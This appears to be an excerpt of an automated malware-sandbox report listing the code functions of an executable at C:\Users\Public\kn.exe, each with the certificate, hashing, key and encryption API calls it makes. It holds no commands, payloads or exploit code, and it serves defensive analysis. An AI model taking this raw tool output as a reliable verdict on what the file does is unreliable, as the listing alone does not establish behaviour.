          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6CE0 NCryptEnumStorageProviders,#360,7_2_00007FF6854E6CE0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,7_2_00007FF6854B0B80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DCBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,7_2_00007FF6854DCBB4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,7_2_00007FF68543CB98
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E0B9C CryptHashData,GetLastError,#357,7_2_00007FF6854E0B9C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68551EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,7_2_00007FF68551EB38
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6C30 NCryptOpenStorageProvider,#360,7_2_00007FF6854E6C30
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,7_2_00007FF68544CC24
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B2BC0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E0BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,7_2_00007FF6854E0BF4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D9688 CryptFindOIDInfo,#357,#360,#360,#360,7_2_00007FF6854D9688
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854676B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6854676B0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CD6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,7_2_00007FF6854CD6A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B3654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF6854B3654
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DF650 CryptHashCertificate2,SetLastError,7_2_00007FF6854DF650
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854AF644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854AF644
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,7_2_00007FF68548366C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,7_2_00007FF68549B664
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF68543D660
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685425664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,7_2_00007FF685425664
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B36E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B36E8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,7_2_00007FF68549F6D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B3590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B3590
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E9580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,7_2_00007FF6854E9580
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DF570 CryptHashCertificate,SetLastError,7_2_00007FF6854DF570
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,7_2_00007FF68547B55C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854995FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,7_2_00007FF6854995FC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543F630 CryptAcquireContextW,GetLastError,#357,SetLastError,7_2_00007FF68543F630
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68543D5C2
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854755F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,7_2_00007FF6854755F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685489878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,7_2_00007FF685489878
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685447884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,7_2_00007FF685447884
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E98B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6854E98B0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,7_2_00007FF68549D850
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF6854A184C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B3860
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854238FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF6854238FC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685433918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685433918
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,7_2_00007FF6854B391C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DF918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,7_2_00007FF6854DF918
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B8D0 I_CryptGetLruEntryData,#357,7_2_00007FF68549B8D0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854818DC CertFindExtension,CryptDecodeObject,GetLastError,#357,7_2_00007FF6854818DC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,7_2_00007FF68542B788
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CB794 CryptExportPublicKeyInfoEx,SetLastError,7_2_00007FF6854CB794
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,7_2_00007FF68544D790
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548577C #360,#358,CryptDecodeObject,GetLastError,#357,7_2_00007FF68548577C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B37A4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DD750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,7_2_00007FF6854DD750
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B5768
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,7_2_00007FF68547F774
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,7_2_00007FF68549B808
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF68544F810
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DF7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,7_2_00007FF6854DF7FC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854517D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,7_2_00007FF6854517D4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C97E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,7_2_00007FF6854C97E4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7290 NCryptIsKeyHandle,#359,#360,#357,#358,7_2_00007FF6854E7290
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DD28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,7_2_00007FF6854DD28C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B32A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6854B32A8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,7_2_00007FF68547B2B4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544D240 #357,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF68544D240
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,7_2_00007FF68549D30C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,7_2_00007FF68544D304
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,7_2_00007FF68544B324
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854932D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF6854932D0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854792C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,7_2_00007FF6854792C4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854AF2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854AF2F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854892D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,7_2_00007FF6854892D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685493188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,7_2_00007FF685493188
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7178 BCryptCloseAlgorithmProvider,#360,7_2_00007FF6854E7178
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854851A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,7_2_00007FF6854851A4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,7_2_00007FF68549F168
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685495164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF685495164
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,7_2_00007FF6854E7214
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685509208 #357,NCryptEnumKeys,#360,#358,7_2_00007FF685509208
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B11C8 NCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF6854B11C8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E71C8 BCryptDestroyKey,#360,7_2_00007FF6854E71C8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B31C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6854B31C0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,7_2_00007FF68549F488
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B9480
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DF4A0 CryptHashPublicKeyInfo,SetLastError,7_2_00007FF6854DF4A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685415438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF685415438
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CB464 CryptEncodeObjectEx,SetLastError,7_2_00007FF6854CB464
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF6854B34F8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685473504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,7_2_00007FF685473504
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E14F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,7_2_00007FF6854E14F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CB4EC CryptDecodeObjectEx,SetLastError,7_2_00007FF6854CB4EC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B3390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF6854B3390
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C33B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,7_2_00007FF6854C33B0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854933A0 CryptVerifyCertificateSignature,CertCompareCertificateName,7_2_00007FF6854933A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E93A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6854E93A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,7_2_00007FF6854E739C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,7_2_00007FF68546B350
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685475338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF685475338
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685447340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,7_2_00007FF685447340
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,7_2_00007FF68543B36C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B342C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF6854E141C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854953E8 CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF6854953E8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854713F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,7_2_00007FF6854713F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68549B3D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68549DEB0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF68546DEA4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,7_2_00007FF685515E3C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DDE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,7_2_00007FF6854DDE70
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515F20 CryptDecodeObjectEx,7_2_00007FF685515F20
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685467F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,7_2_00007FF685467F14
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A5F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,7_2_00007FF6854A5F04
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,7_2_00007FF6854E7EE8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C5D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,7_2_00007FF6854C5D80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546DD80 CertFindExtension,CryptDecodeObject,7_2_00007FF68546DD80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685445DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF685445DA1
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854EBD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,7_2_00007FF6854EBD3C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,7_2_00007FF6854E7D3C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515D74 CryptDecodeObjectEx,strcmp,strcmp,7_2_00007FF685515D74
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685469D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685469D6C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685471D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF685471D70
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685493D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,7_2_00007FF685493D60
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685445DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,7_2_00007FF685445DF7
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A1E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,7_2_00007FF6854A1E2C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685421DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,7_2_00007FF685421DE8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DE044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,7_2_00007FF6854DE044
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685484070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,7_2_00007FF685484070
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854460DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF6854460DA
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF6854B9F90
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF6854B5FA8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685485F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,7_2_00007FF685485F54
